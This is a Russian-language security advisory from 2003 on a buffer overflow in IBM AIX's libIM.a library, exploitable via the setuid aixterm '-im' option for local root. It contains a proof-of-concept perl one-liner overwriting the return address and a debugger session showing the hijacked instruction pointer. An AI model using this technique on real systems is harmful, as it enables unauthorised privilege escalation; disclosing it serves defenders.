Переполнение буфера в IBM AIX.
| Дата публикации: | 18.02.2003 |
| Всего просмотров: | 1126 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: |
Переполнение буфера обнаружено в libIM.a National Language Support system библиотеке в операционной системе IBM's AIX. Локальный пользователь может получить поднятые привилегии на системе, включая root привилегии. Локальный пользователь может вызвать '/usr/lpp/X11/bin/aixterm' с '-im' опцией командной строки и специально обработанным параметром команды, чтобы эксплуатировать обнаруженный недостаток и выполнить произвольный код с root привилегиями. Пример:
ls -la /usr/lpp/X11/bin/aixterm
- -rwsr-xr-x 1 root system 376384 Mar 18 2001
/usr/lpp/X11/bin/aixterm*
$ cp -p /usr/lpp/X11/bin/aixterm test
$ ./test -im `perl -e'print"A"x47;print pack("l",0x11223344)'`
1363-009 aixterm: Cannot open font -dt-interface
user-medium-r-normal-l*-*-*-*-*-*-*-*-*.
Check path name and permissions.
1363-009 aixterm: Cannot open font
- -*-roman-medium-r-normal--8-50-100-100-c-*-ISO8859-1.
Check path name and permissions.
Illegal instruction (core dumped)
$ dbx ./test core
Type 'help' for help.
reading symbolic information ...warning: no source compiled with -g
[using memory image in core]
warning: Unable to access address 0x41414149 from core
Illegal instruction (reserved addressing fault) in . at 0x11223344 ($t1)
warning: Unable to access address 0x11223344 from core 0x11223344 (???)
warning: Unable to access address
0x11223344 from core ffffffff warning: Unable to access address
0x11223344 from core fnmadd.
fr31,fr31,fr31,fr31 (dbx)
Уязвимость обнаружена в IBM AIX 4.3, 5.1, 5.2
|
| Ссылки: | iDEFENSE Security Advisory 02.12.03: Buffer Overflow in AIX libIM.a |